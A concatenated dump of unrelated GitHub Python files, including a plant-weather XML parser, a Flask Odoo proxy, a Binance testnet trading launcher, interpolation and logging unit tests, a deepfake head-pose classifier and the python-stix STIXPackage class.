float(temp.find('WIND_SPEED_MAX').text)\n\t\t\twind_low = float(temp.find('WIND_SPEED_MIN').text)\n\t\t\twind_nat = temp.find('WIND_NATURE').text\n\t\t\t# wind_cont = temp.find('WIND_CONTENT').text\n\t\t\tfor wind_c in root.iter('WIND_CONTENT'):\n\t\t\t\tfor wind_a in root.iter('ACID'):\n\t\t\t\t\t# wind_acid = wind_c.find('ACID').text\n\t\t\t\t\tfor wind_a1 in root.iter('CO2'):\n\t\t\t\t\t\twind_acid_co2_min = float(wind_a1.find('CO2_MIN').text)\n\t\t\t\t\t\twind_acid_co2_high = float(wind_a1.find('CO2_MAX').text)\n\t\t\t\t\tfor wind_a2 in root.iter('HCLO3'):\n\t\t\t\t\t\twind_acid_HCLO3_min = float(wind_a2.find('HCLO3_MIN').text)\n\t\t\t\t\t\twind_acid_HCLO3_high = float(wind_a2.find('HCLO3_MAX').text)\n\t\t\t\tfor wind_b in root.iter('BASE'):\n\t\t\t\t\t# wind_acid = wind_c.find('ACID').text\n\t\t\t\t\tfor wind_b1 in root.iter('SOAP_VAPOUR'):\n\t\t\t\t\t\twind_base_min = float(wind_b1.find('SOAP_VAPOUR_MIN').text)\n\t\t\t\t\t\twind_base_max = float(wind_b1.find('SOAP_VAPOUR_MAX').text)\n\t\t\t\tfor wind_t in 
root.iter('TOXIC'):\n\t\t\t\t\twind_toxic_co_min = float(wind_t.find('CO_MIN').text)\n\t\t\t\t\twind_toxic_co_high = float(wind_t.find('CO_MAX').text)\n\n\t\tfor temp in root.iter('HUMIDITY'):\n\t\t\tAH_high = float(temp.find('ABSOLUTE_HUMIDITY_TOP').text)\n\t\t\tAH_low = float(temp.find('ABSOLUTE_HUMIDITY_BOTTOM').text)\n\t\t\tRH_high = float(temp.find('RELATIVE_HUMIDITY_TOP').text)\n\t\t\tRH_low = float(temp.find('RELATIVE_HUMIDITY_BOTTOM').text)\n\n\t\tfor temp in root.iter('SOILE'):\n\t\t\tfor water_cont in root.iter('WATER_CONTENT'):\n\t\t\t\tSOIL_M_MIN = float(water_cont.find('WATER_CONTENT_MIN').text)\n\t\t\t\tSOIL_M_MAX = float(water_cont.find('WATER_CONTENT_MAX').text)\n\n\t\tfor ph in root.iter('PH'):\n\t\t\tPH_top = float(ph.find('PH_TOP').text)\n\t\t\tPH_bottom = float(ph.find('PH_BOTTOM').text)\n\n\t\tfor light in root.iter('LIGHTING'):\n\t\t\tfor intencity in root.iter('INTENCITY'):\n\t\t\t\tintencity_top = float(intencity.find('INTENCITY_TOP').text)\n\t\t\t\tintencity_bottom = float(intencity.find('INTENCITY_BOTTOM').text)\n\t\t\tfor UV in root.iter('UV_CONDITION'):\n\t\t\t\tUV_top = float(UV.find('UV_CONDITION_TOP').text)\n\t\t\t\tUV_bottom = float(UV.find('UV_CONDITION_BOTTM').text)\n\t\t\tfor IR in root.iter('IR_CONDITION'):\n\t\t\t\tIR_top = float(IR.find('IR_CONDITION_TOP').text)\n\t\t\t\tIR_bottom = float(IR.find('IR_CONDITION_BOTTOM').text)\n\n\t\t\n\t\tprint(\"############# END OF GATHERING XML DATA ##########\")\t\n\t\tprint(\"getFlowerXML_Data\")\n\t\tprint(\"____________________\")\n\t\tprint(\"temp_high\",temp_high)\n\t\tprint(\"temp_low : \",temp_low)\n\t\tprint(\"____________________\")\n\t\tprint(\"wind_high : \",wind_high)\n\t\tprint(\"wind_low : \",wind_low)\n\n\t\tprint(\"wind_nat : \",wind_nat)\n\n\t\tprint(\"wind_acid_co2_min : \",wind_acid_co2_min)\n\t\tprint(\"wind_acid_co2_high : \",wind_acid_co2_high)\n\n\t\tprint(\"wind_acid_HCLO3_min : \",wind_acid_HCLO3_min)\n\t\tprint(\"wind_acid_HCLO3_high : \",wind_acid_HCLO3_high)\n\n\t\tprint(\"wind_base_min : \",wind_base_min)\n\t\tprint(\"wind_base_max : \",wind_base_max)\n\n\t\tprint(\"wind_toxic_co_min : \",wind_toxic_co_min)\n\t\tprint(\"wind_toxic_co_high : \",wind_toxic_co_high)\n\t\tprint(\"____________________\")\n\t\tprint(\"ABSOLUTE_HUMIDITY_TOP : \", AH_high)\n\t\tprint(\"ABSOLUTE_HUMIDITY_BOTTOM : \", AH_low)\n\n\t\tprint(\"RELATIVE_HUMIDITY_TOP : \", RH_high)\n\t\tprint(\"RELATIVE_HUMIDITY_BOTTOM : \", RH_low)\n\t\tprint(\"____________________\")\n\t\tprint(\"WATER_CONTENT_MIN : \", SOIL_M_MIN)\n\t\tprint(\"WATER_CONTENT_MAX : \", SOIL_M_MAX)\n\t\tprint(\"____________________\")\n\t\tprint(\"PH_TOP : \", PH_top)\n\t\tprint(\"PH_BOTTOM : \", PH_bottom)\n\t\tprint(\"____________________\")\n\t\tprint(\"INTENCITY_TOP : \", intencity_top)\n\t\tprint(\"INTENCITY_BOTTOM : \", intencity_bottom)\n\n\t\tprint(\"UV_CONDITION_TOP : \", UV_top)\n\t\tprint(\"UV_CONDITION_BOTTOM : \", UV_bottom)\n\n\t\tprint(\"IR_CONDITION_TOP : \", IR_top)\n\t\tprint(\"IR_CONDITION_BOTTOM : \", IR_bottom)\n\t\tprint(\"____________________\")\n\n\t\tprint(\"############# END OF GATHERING XML DATA ##########\")\n\n\n\n\n# w = whetherAnalysis\n# w.__init__(25, 127,\"stormy\",100,2,5,20, 10,50, 100, 5.6, 30, 4, 6)\n\n# w.tempratureAnalysis()\n# w.windAnalysis()\n# w.humidityAnalysis()\n# 
w.soileMoistureAnalysis()","repo_name":"UdaraAbeyrathna/Diseases-Spreading-Simulation-Application-for-Plants","sub_path":"whetherAnalysis.py","file_name":"whetherAnalysis.py","file_ext":"py","file_size_in_byte":16350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"32090237767","text":"import os\nimport logging\nfrom flask import Flask, request, jsonify, make_response, render_template\nfrom auth import check_odoo_alive, check_odoo_login\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\napp = Flask(__name__)\napp.config['SHOW_LOGS'] = os.getenv(\"SHOW_LOGS\")\n\nif app.config['SHOW_LOGS'] == 'True':\n proxy_log_file = os.getenv(\"PROXY_LOG_FILE\")\n logging.basicConfig(filename=proxy_log_file, level=logging.DEBUG,\n format=f'%(asctime)s %(levelname)s %(name)s %(threadName)s : %(message)s')\n\n\n@app.route('/')\ndef index():\n message = \"\"\n response = check_odoo_alive()\n\n if type(response) == list and '502' in response[0]:\n message += \"But, there is an error trying to connect Odoo server: [Bad Gateway - 502], \" \\\n \"check if Odoo is running and proxy configurations HOST and/or PORT are correct.\"\n\n return render_template('home.html', message=message)\n\n\n@app.route('/api/login/', methods=['POST'])\ndef login():\n \"\"\"\n Manage app login\n :return: True or False\n \"\"\"\n data = request.get_json()\n\n if data['database'] and data['username'] and data['password']:\n response = check_odoo_login(data, 'login')\n\n return make_response(jsonify({\"message\": response[0]}), response[1])\n else:\n return make_response(jsonify({\"message\": \"Unauthorized - 401\"}), 401)\n\n\n@app.route('/api/call_kw/', methods=['POST'])\ndef call_kw():\n \"\"\"\n Manage call to methods in Odoo\n :return: Response\n \"\"\"\n options = []\n\n try:\n data = request.get_json()\n\n if data['host'] and data['port'] and data['database'] and data['username'] \\\n and data['password']:\n response = check_odoo_login(data, 'call_kw')\n\n if 'options' in data:\n options = data['options']\n\n if response and data['model'] and data['method']:\n result = response.execute(data['model'], data['method'], options)\n\n return jsonify(message=\"Response success - 200\", response=result)\n\n else:\n return jsonify(message=response)\n else:\n return make_response(jsonify(message=\"Unauthorized - 401\"), 401)\n except Exception:\n return make_response(jsonify(message=\"Not Implemented - 501\"), 501)\n\n\ndef build_logs(file_url):\n \"\"\"Creates logging information\"\"\"\n number_logs_lines = int(os.getenv(\"NUMBER_LOGS_LINES\"))\n\n try:\n with open(file_url) as f:\n logs = f.readlines()[-number_logs_lines:]\n\n return logs\n except IOError:\n return ['Log file not found, check your configuration file.']\n\n\n@app.route('/proxy-logs')\ndef proxy_logs():\n \"\"\"Returns proxy logging information\"\"\"\n if app.config['SHOW_LOGS'] == 'True':\n log_file = os.getenv(\"PROXY_LOG_FILE\")\n\n return render_template('logs.html', log_type=\"Proxy\", logs_data=build_logs(log_file))\n\n return render_template('no_debug.html')\n\n\n@app.route('/odoo-logs')\ndef odoo_logs():\n \"\"\"Returns odoo logging information\"\"\"\n if app.config['SHOW_LOGS'] == 'True':\n log_file = os.getenv(\"ODOO_LOG_FILE\")\n\n return render_template('logs.html', log_type=\"Odoo\", logs_data=build_logs(log_file))\n\n return render_template('no_debug.html')\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0',\n debug=True,\n 
port=8080)\n","repo_name":"renelhs/react-native-odoo-proxy","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"44"} +{"seq_id":"31649446207","text":"import json\nimport os\nimport sys\nfrom datetime import datetime\nfrom pathlib import Path\n\nimport pymongo\nimport yaml\nfrom binance.client import Client\n\nfrom tensortrader.tasks.task_utils import create_logging\nfrom tensortrader.Trader.trader import BinanceTrader\n\n\ndef run(symbol):\n\n path = (\n \"/mnt/d/Tensor/tensortrader-system/\" \"tensortrader/config/trading/{}.yml\"\n ).format(symbol)\n CONF = yaml.safe_load(Path(path).read_text())\n\n print(CONF)\n\n # -----------------------------\n # Parameters\n # -----------------------------\n symbol = CONF[\"symbol\"]\n units = CONF[\"units\"]\n max_trades = CONF[\"max_trades\"]\n signal_loc = CONF[\"signal_loc\"]\n config_loc = CONF[\"config_loc\"]\n path_logs = CONF[\"path_logs\"]\n model = CONF[\"model\"]\n bar_length = CONF[\"bar_length\"]\n position = CONF[\"position\"]\n max_trade_time = CONF[\"max_trade_time\"] # minutes\n target_usdt = CONF[\"target_usdt\"] # USDT\n stop_usdt = CONF[\"stop_usdt\"] # USDT\n database_loc = CONF[\"database_loc\"]\n\n # -----------------------------\n # Logging Config\n # -----------------------------\n timestamp = datetime.now().strftime(\"%Y-%m-%d-%H-%M\")\n trading_dir = os.path.join(path_logs, f\"Trading_Execution_LOG_{symbol}\")\n\n if not os.path.exists(trading_dir):\n os.mkdir(trading_dir)\n\n print(\"Storing Price Return data at\", trading_dir)\n\n LOG_FILENAME = os.path.join(trading_dir, f\"{timestamp}_Trading_Execution.log\")\n\n print(\"Logging data at \", LOG_FILENAME)\n\n logger = create_logging(LOG_FILENAME)\n\n # -----------------------------\n # Trader\n # -----------------------------\n with open(config_loc) as f:\n SECRETS = json.load(f)\n f.close()\n\n api_key = SECRETS.get(\"key_test\")\n api_secret = SECRETS.get(\"secret_test\")\n\n try:\n binance_client = Client(\n api_key=api_key, api_secret=api_secret, tld=\"com\", testnet=True\n )\n logger.info(\"Connection to Binance Test API sucessfully created.\")\n except Exception as e:\n logger.error(f\"{e}\")\n\n try:\n MONGO_PASSWORD = SECRETS.get(\"MONGO_PASSWORD\")\n MONGO_USER = SECRETS.get(\"MONGO_USER\")\n MONGO_URL = (\n \"mongodb+srv://{}:{}@tensor-database\"\n \".rjyvv.mongodb.net/?retryWrites=true&w=majority\"\n ).format(MONGO_USER, MONGO_PASSWORD)\n\n mongo_client = pymongo.MongoClient(MONGO_URL)\n\n mongodb_database = mongo_client[\"Trading_Execution\"]\n mongodb_collection = mongodb_database[f\"{symbol}\"]\n\n logger.info(\"Connection to MONGO DB sucessfully created.\")\n except Exception as e:\n logger.error(f\"{e}\")\n\n trader = BinanceTrader(\n symbol=symbol,\n database_loc=database_loc,\n mongodb_collection=mongodb_collection,\n signal_loc=signal_loc,\n bar_length=bar_length,\n client=binance_client,\n model=model,\n units=units,\n position=position,\n max_trades=max_trades,\n max_trade_time=max_trade_time,\n target_usdt=target_usdt,\n stop_usdt=stop_usdt,\n logger=logger,\n )\n\n trader.start_trading()\n\n # trader.start_streaming()\n\n\n# if __name__ == \"__main__\":\n\n# symbol = sys.argv[1]\n# # symbol = 'BTCUSDT'\n# 
main(symbol)\n","repo_name":"john2408/tensortrader-system","sub_path":"tensortrader/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3274,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"1241772377","text":"import unittest\nimport pandas as pd\nfrom actions import Interpolate1DAction, Interpolate2DAction\nfrom tables import Table\n\n\nclass TestInterpolationClasses(unittest.TestCase):\n \n def setUp(self):\n self.norms_data = pd.DataFrame({\n 'regressor1': [0, 0, 1, 1, 2, 2, 3, 3, 4, 4, 5, 5],\n 'regressor2': [0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1],\n 'type1': [0, 0.5, 1, 1.5, 1, 1.5, 2, 2.5, 2, 2.5],\n })\n self.norms = Table(self.norms_data)\n\n self.test_data = pd.DataFrame({\n 'regressor1': [1.5, 2.5, 3.5],\n 'regressor2': [3, 5, 7],\n 'data_type': ['type1', 'type1', 'type1']\n })\n self.test_table = Table(self.test_data)\n\n def test_interpolate_1d_action(self):\n action = Interpolate1DAction(\n regressor_col='regressor1',\n norms=self.norms,\n data_interpolated_col='interpolated',\n data_type_col='data_type'\n )\n\n interpolated_table = action.action(self.test_table)\n print(interpolated_table)\n interpolated_values = interpolated_table.data['interpolated'].values\n\n # Test if the interpolated values are correct\n expected_values = [15, 25, 35]\n self.assertTrue((interpolated_values == expected_values).all())\n\n def test_interpolate_2d_action(self):\n action = Interpolate2DAction(\n regressor_cols=['regressor1', 'regressor2'],\n norms=self.norms,\n data_interpolated_col='interpolated',\n data_type_col='data_type'\n )\n\n interpolated_table = action.action(self.test_table)\n print(interpolated_table)\n interpolated_values = interpolated_table.data['interpolated'].values\n\n # Test if the interpolated values are correct\n expected_values = [15, 25, 35]\n self.assertTrue((interpolated_values == expected_values).all())\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"bercelhegedus/management","sub_path":"unittests.py","file_name":"unittests.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"25630428546","text":"from video_data import VideoData\nfrom posicao_facial import CalculadorPose\nimport numpy\nimport pickle\nimport sklearn.svm._classes\n\nnariz = list(range(28, 37))\nsobrancelha_esquerda = list(range(18, 23))\nsobrancelha_direita = list(range(23, 28))\ncantos_boca = [49, 55]\ncentro_rosto = nariz + sobrancelha_esquerda + sobrancelha_direita + cantos_boca\nface_inteira = list(range(1, 18)) + centro_rosto\n\ndef classifica_faces(video_data: VideoData, caminho_classificador=\"../dataset/deepfake-detection-challenge/train_sample_videos/modelo_SVM.pkl\"):\n pose_estimator = CalculadorPose((video_data.largura, video_data.altura))\n\n with open(caminho_classificador, 'rb') as f:\n model = pickle.load(f, fix_imports=True)\n classifier = model[0]\n scaler = model[1]\n probabilidades = list()\n for face in video_data.pontos_faciais:\n for frame in face:\n probabilidade = examine_a_face(frame, classifier, scaler, pose_estimator)\n probabilidades.append(probabilidade)\n return sum(probabilidades)/len(probabilidades)\n\ndef examine_a_face(landmarks, classifier, scaler, pose_estimator: CalculadorPose):\n # extract head pose\n R_c, t_c = None, None\n R_a, t_a = None, None\n R_c_matrix, R_a_matrix = None, None\n\n R_c, t_c = pose_estimator.solve_single_pose(landmarks, centro_rosto)\n R_a, t_a = 
pose_estimator.solve_single_pose(landmarks, face_inteira)\n R_c_matrix = pose_estimator.Rodrigues_convert(R_c)\n R_a_matrix = pose_estimator.Rodrigues_convert(R_a)\n\n rotation_matrix_feature = (R_c_matrix - R_a_matrix).flatten()\n translation_vector_feature = (t_c - t_a)[:, -1]\n feature = numpy.concatenate([rotation_matrix_feature, translation_vector_feature]).reshape(1, -1)\n scaled_feature = scaler.transform(feature)\n score = classifier.predict_proba(scaled_feature)\n\n return score[0][-1]\n","repo_name":"orvergon/detector_ensemble_deepfake","sub_path":"classificador_pos_facial_svm.py","file_name":"classificador_pos_facial_svm.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"13515470259","text":"from mixbox import idgen\nfrom mixbox import fields\n\n# cybox\nfrom cybox.core import Observable, Observables\n\n# base\nimport stix\n\n# utility imports\nfrom .. import utils\nfrom ..utils import parser\nfrom ..utils import deprecated\n\n# component imports\nfrom ..campaign import Campaign\nfrom ..coa import CourseOfAction\nfrom ..exploit_target import ExploitTarget\nfrom ..indicator import Indicator\nfrom ..incident import Incident\nfrom ..threat_actor import ThreatActor\nfrom ..ttp import TTP\nfrom ..report import Report\n\n# relationship imports\nfrom ..common.related import RelatedPackages\n\n# relative imports\nfrom .stix_header import STIXHeader\nfrom .ttps import TTPs\nfrom . import (Campaigns, CoursesOfAction, ExploitTargets, Incidents,\n Indicators, ThreatActors, Reports)\n\n# binding imports\nimport stix.bindings.stix_core as stix_core_binding\nimport mixbox.entities\n\nclass STIXPackage(stix.Entity):\n \"\"\"A STIX Package object.\n\n Args:\n id_ (optional): An identifier. If ``None``, a value will be generated\n via ``mixbox.idgen.create_id()``. If set, this will unset the\n ``idref`` property.\n idref: **DEPRECATED** An identifier reference. If set this will unset\n the ``id_`` property.\n timestamp: **DEPRECATED** A timestamp value. Can be an instance of\n ``datetime.datetime`` or ``str``.\n header: A Report :class:`.Header` object.\n campaigns: A collection of :class:`.Campaign` objects.\n course_of_action: A collection of :class:`.CourseOfAction` objects.\n exploit_targets: A collection of :class:`.ExploitTarget` objects.\n incidents: A collection of :class:`.Incident` objects.\n indicators: A collection of :class:`.Indicator` objects.\n threat_actors: A collection of :class:`.ThreatActor` objects.\n ttps: A collection of :class:`.TTP` objects.\n related_packages: **DEPRECATED**. 
A collection of\n :class:`.RelatedPackage` objects.\n reports: A collection of :class:`.Report` objects.\n\n \"\"\"\n _binding = stix_core_binding\n _binding_class = _binding.STIXType\n _namespace = 'http://stix.mitre.org/stix-1'\n _version = \"1.2\"\n _ALL_VERSIONS = (\"1.0\", \"1.0.1\", \"1.1\", \"1.1.1\", \"1.2\")\n\n id_ = fields.IdField(\"id\")\n idref = fields.IdrefField(\"idref\", preset_hook=deprecated.field)\n version = fields.TypedField(\"version\")\n timestamp = fields.DateTimeField(\"timestamp\", preset_hook=deprecated.field)\n stix_header = fields.TypedField(\"STIX_Header\", STIXHeader)\n campaigns = fields.TypedField(\"Campaigns\", Campaigns)\n courses_of_action = fields.TypedField(\"Courses_Of_Action\", CoursesOfAction)\n exploit_targets = fields.TypedField(\"Exploit_Targets\", ExploitTargets)\n observables = fields.TypedField(\"Observables\", Observables)\n indicators = fields.TypedField(\"Indicators\", Indicators)\n incidents = fields.TypedField(\"Incidents\", Incidents)\n threat_actors = fields.TypedField(\"Threat_Actors\", ThreatActors)\n ttps = fields.TypedField(\"TTPs\", TTPs)\n related_packages = fields.TypedField(\"Related_Packages\", RelatedPackages)\n reports = fields.TypedField(\"Reports\", Reports)\n\n def __init__(self, id_=None, idref=None, timestamp=None, stix_header=None,\n courses_of_action=None, exploit_targets=None, indicators=None,\n observables=None, incidents=None, threat_actors=None,\n ttps=None, campaigns=None, related_packages=None,\n reports=None):\n \n super(STIXPackage, self).__init__()\n \n self.id_ = id_ or idgen.create_id(\"Package\")\n self.idref = idref\n self.version = STIXPackage._version\n self.stix_header = stix_header\n self.campaigns = campaigns or Campaigns()\n self.courses_of_action = courses_of_action or CoursesOfAction()\n self.exploit_targets = exploit_targets or ExploitTargets()\n self.observables = observables or Observables()\n self.indicators = indicators or Indicators()\n self.incidents = incidents or Incidents()\n self.threat_actors = threat_actors or ThreatActors()\n self.ttps = ttps\n self.related_packages = related_packages\n self.reports = reports or Reports()\n self.timestamp = timestamp\n\n def add_indicator(self, indicator):\n \"\"\"Adds an :class:`.Indicator` object to the :attr:`indicators`\n collection.\n\n \"\"\"\n if self.indicators is None:\n self.indicators = Indicators()\n self.indicators.append(indicator)\n\n def add_campaign(self, campaign):\n \"\"\"Adds a :class:`Campaign` object to the :attr:`campaigns` collection.\n\n \"\"\"\n if self.campaigns is None:\n self.campaigns = Campaigns()\n self.campaigns.append(campaign)\n\n def add_observable(self, observable):\n \"\"\"Adds an ``Observable`` object to the :attr:`observables` collection.\n\n If `observable` is not an ``Observable`` instance, an effort will be\n made to convert it to one.\n\n \"\"\"\n if not self.observables:\n self.observables = Observables(observables=observable)\n else:\n self.observables.add(observable)\n\n def add_incident(self, incident):\n \"\"\"Adds an :class:`.Incident` object to the :attr:`incidents`\n collection.\n\n \"\"\"\n if self.incidents is None:\n self.incidents = Incidents()\n self.incidents.append(incident)\n\n def add_threat_actor(self, threat_actor):\n \"\"\"Adds an :class:`.ThreatActor` object to the :attr:`threat_actors`\n collection.\n\n \"\"\"\n if self.threat_actors is None:\n self.threat_actors = ThreatActors()\n self.threat_actors.append(threat_actor)\n\n def add_course_of_action(self, course_of_action):\n 
\"\"\"Adds an :class:`.CourseOfAction` object to the\n :attr:`courses_of_action` collection.\n\n \"\"\"\n if self.courses_of_action is None:\n self.courses_of_action = CoursesOfAction()\n self.courses_of_action.append(course_of_action)\n\n def add_exploit_target(self, exploit_target):\n \"\"\"Adds an :class:`.ExploitTarget` object to the\n :attr:`exploit_targets` collection.\n\n \"\"\"\n if self.exploit_targets is None:\n self.exploit_targets = ExploitTargets()\n self.exploit_targets.append(exploit_target)\n\n def add_ttp(self, ttp):\n \"\"\"Adds an :class:`.TTP` object to the :attr:`ttps` collection.\n\n \"\"\"\n if self.ttps is None:\n self.ttps = TTPs()\n self.ttps.ttp.append(ttp)\n\n def add_report(self, report):\n \"\"\"Adds a :class:`.Report` object to the :attr:`reports` collection.\n\n \"\"\"\n if self.reports is None:\n self.reports = Reports()\n self.reports.append(report)\n\n def add_related_package(self, related_package):\n \"\"\"Adds a :class:`.RelatedPackage` object to the\n :attr:`related_packages` collection.\n\n \"\"\"\n if self.related_packages is None:\n self.related_packages = RelatedPackages()\n self.related_packages.append(related_package)\n\n def add(self, entity):\n \"\"\"Adds `entity` to a top-level collection. For example, if `entity` is\n an Indicator object, the `entity` will be added to the ``indicators``\n top-level collection.\n\n \"\"\"\n if utils.is_cybox(entity):\n self.add_observable(entity)\n return\n\n tlo_adds = {\n Campaign: self.add_campaign,\n CourseOfAction: self.add_course_of_action,\n ExploitTarget: self.add_exploit_target,\n Incident: self.add_incident,\n Indicator: self.add_indicator,\n ThreatActor: self.add_threat_actor,\n TTP: self.add_ttp,\n Report: self.add_report,\n Observable: self.add_observable,\n }\n\n try:\n add = tlo_adds[entity.__class__]\n add(entity)\n except KeyError:\n error = \"Cannot add type '{0}' to a top-level collection\"\n error = error.format(type(entity))\n raise TypeError(error)\n\n @classmethod\n def from_xml(cls, xml_file, encoding=None):\n \"\"\"Parses the `xml_file` file-like object and returns a\n :class:`STIXPackage` instance.\n\n Args:\n xml_file: A file, file-like object, etree._Element, or\n etree._ElementTree instance.\n encoding: The character encoding of the `xml_file` input. If\n ``None``, an attempt will be made to determine the input\n character encoding. 
Default is ``None``.\n\n Returns:\n An instance of :class:`STIXPackage`.\n\n \"\"\"\n entity_parser = parser.EntityParser()\n return entity_parser.parse_xml(xml_file, encoding=encoding)\n","repo_name":"STIXProject/python-stix","sub_path":"stix/core/stix_package.py","file_name":"stix_package.py","file_ext":"py","file_size_in_byte":8859,"program_lang":"python","lang":"en","doc_type":"code","stars":234,"dataset":"github-code","pt":"44"} +{"seq_id":"42908411528","text":"import sys\nimport numpy as np\nimport pytest\n\nfrom mspasspy.ccore.seismic import Seismogram\n\nsys.path.append(\"python/tests\")\nsys.path.append(\"python/mspasspy/util/\")\nimport logging_helper\nfrom helper import (\n get_live_seismogram,\n get_live_timeseries,\n get_live_timeseries_ensemble,\n get_live_seismogram_ensemble,\n)\n\n\ndef test_info_new_map():\n # Seismogram and TimeSeries\n seis = get_live_seismogram()\n assert seis.number_of_stages() == 0\n logging_helper.info(seis, \"1\", \"dummy_func\")\n assert seis.number_of_stages() == 1\n\n ts = get_live_timeseries()\n assert ts.number_of_stages() == 0\n logging_helper.info(ts, \"1\", \"dummy_func\")\n assert ts.number_of_stages() == 1\n\n # ensemble\n seis_e = get_live_seismogram_ensemble(3)\n logging_helper.info(seis_e, \"0\", \"dummy_func\")\n for i in range(3):\n assert seis_e.member[i].number_of_stages() == 1\n\n seis_e = get_live_seismogram_ensemble(3)\n logging_helper.info(seis_e, \"0\", \"dummy_func\", 0)\n assert seis_e.member[0].number_of_stages() == 1\n\n tse = get_live_timeseries_ensemble(3)\n logging_helper.info(tse, \"0\", \"dummy_func\", 0)\n assert tse.member[0].number_of_stages() == 1\n\n\ndef test_info_not_live():\n # Seismogram and TimeSeries\n seis = get_live_seismogram()\n seis.kill()\n assert seis.number_of_stages() == 0\n logging_helper.info(seis, \"1\", \"dummy_func\")\n assert seis.number_of_stages() == 0\n\n # ensemble\n seis_e = get_live_seismogram_ensemble(3)\n assert seis_e.member[0].number_of_stages() == 0\n seis_e.member[0].kill()\n logging_helper.info(seis_e, \"0\", \"dummy_func\", 0)\n assert seis_e.member[0].number_of_stages() == 0\n\n\ndef test_info_out_of_bound():\n seis_e = get_live_seismogram_ensemble(3)\n with pytest.raises(IndexError) as err:\n logging_helper.info(seis_e, \"0\", \"dummy_func\", 3)\n assert seis_e.member[0].number_of_stages() == 0\n\n\ndef test_info_empty():\n # Seismogram and TimeSeries\n seis = Seismogram()\n seis.set_live()\n assert len(seis.elog.get_error_log()) == 0\n logging_helper.info(seis, \"1\", \"dummy_func\")\n assert len(seis.elog.get_error_log()) == 1\n\n\ndef test_reduce_functionality():\n # Seismogram and TimeSeries\n seis = get_live_seismogram()\n assert seis.number_of_stages() == 0\n logging_helper.info(seis, \"1\", \"dummy_func\")\n logging_helper.info(seis, \"2\", \"dummy_func_2\")\n assert seis.number_of_stages() == 2\n seis2 = get_live_seismogram()\n assert seis2.number_of_stages() == 0\n logging_helper.reduce(seis2, seis, \"3\", \"reduce\")\n assert len(seis2.get_nodes()) == 3\n\n ts = get_live_timeseries()\n ts2 = get_live_timeseries()\n assert ts.number_of_stages() == 0\n logging_helper.info(ts, \"1\", \"dummy_func\")\n logging_helper.info(ts, \"2\", \"dummy_func\")\n assert ts.number_of_stages() == 2\n logging_helper.reduce(ts2, ts, \"3\", \"reduce\")\n assert len(ts2.get_nodes()) == 3\n\n # ensemble\n seis_e = get_live_seismogram_ensemble(3)\n seis_e2 = get_live_seismogram_ensemble(3)\n logging_helper.info(seis_e, \"0\", \"dummy_func\")\n logging_helper.info(seis_e, \"1\", 
\"dummy_func\")\n logging_helper.info(seis_e, \"2\", \"dummy_func\")\n logging_helper.reduce(seis_e2, seis_e, \"3\", \"reduce\")\n for i in range(3):\n assert len(seis_e2.member[i].get_nodes()) == 4\n\n tse = get_live_timeseries_ensemble(3)\n tse2 = get_live_timeseries_ensemble(3)\n logging_helper.info(tse, \"0\", \"dummy_func\")\n logging_helper.info(tse, \"1\", \"dummy_func\")\n logging_helper.info(tse, \"2\", \"dummy_func\")\n logging_helper.reduce(tse2, tse, \"3\", \"reduce\")\n for i in range(3):\n assert len(tse2.member[i].get_nodes()) == 4\n\n\ndef test_reduce_error():\n tse = get_live_timeseries_ensemble(3)\n tse2 = get_live_timeseries_ensemble(2)\n with pytest.raises(IndexError) as err:\n logging_helper.reduce(tse, tse2, \"0\", \"dummy_func\")\n assert (\n str(err.value)\n == \"logging_helper.reduce: data1 and data2 have different sizes of member\"\n )\n\n tse3 = get_live_timeseries_ensemble(3)\n ts = get_live_timeseries()\n with pytest.raises(TypeError) as ex:\n logging_helper.reduce(ts, tse3, \"0\", \"dummy_func\")\n assert str(ex.value) == \"logging_helper.reduce: data2 has a different type as data1\"\n\n\ndef test_reduce_dead_silent():\n seis = get_live_seismogram()\n assert seis.number_of_stages() == 0\n logging_helper.info(seis, \"1\", \"dummy_func\")\n logging_helper.info(seis, \"2\", \"dummy_func_2\")\n assert seis.number_of_stages() == 2\n seis.kill()\n seis2 = get_live_seismogram()\n assert seis2.number_of_stages() == 0\n logging_helper.reduce(seis2, seis, \"3\", \"reduce\")\n assert len(seis2.get_nodes()) == 3\n\n seis = get_live_seismogram()\n seis2 = get_live_seismogram()\n logging_helper.info(seis, \"1\", \"dummy_func\")\n logging_helper.info(seis, \"2\", \"dummy_func_2\")\n seis2.kill()\n logging_helper.reduce(seis2, seis, \"3\", \"reduce\")\n assert len(seis2.get_nodes()) == 0\n\n\nif __name__ == \"__main__\":\n test_reduce_functionality()\n","repo_name":"mspass-team/mspass","sub_path":"python/tests/util/test_logging_helper.py","file_name":"test_logging_helper.py","file_ext":"py","file_size_in_byte":5044,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"44"} +{"seq_id":"20078177181","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 31 21:28:58 2019\n\n@author: ankusmanish\n\"\"\"\n\ndata = [{'id': 1, 'success': True, 'name': 'Lary'},\n {'id': 2, 'success': False, 'name': 'Rabi'},\n {'id': 3, 'success': True, 'name': 'Alex'}]\n\na = 0\n#loop that counts the 'true' value\nfor i in range(len(data)):\n if data[i]['success'] == True:\n a = a + 1\n\nprint('The count of true value is : {}'.format(a)) \n","repo_name":"AnkusManish/Machine-Learning","sub_path":"Week2/Dictionary/Program_10.py","file_name":"Program_10.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"42346134458","text":"import pytest as pytest\nfrom httpx import AsyncClient\n\nfrom core.settings import settings\n\n\n@pytest.mark.asyncio\nasync def test_get_user_contributions(client: AsyncClient):\n r = await 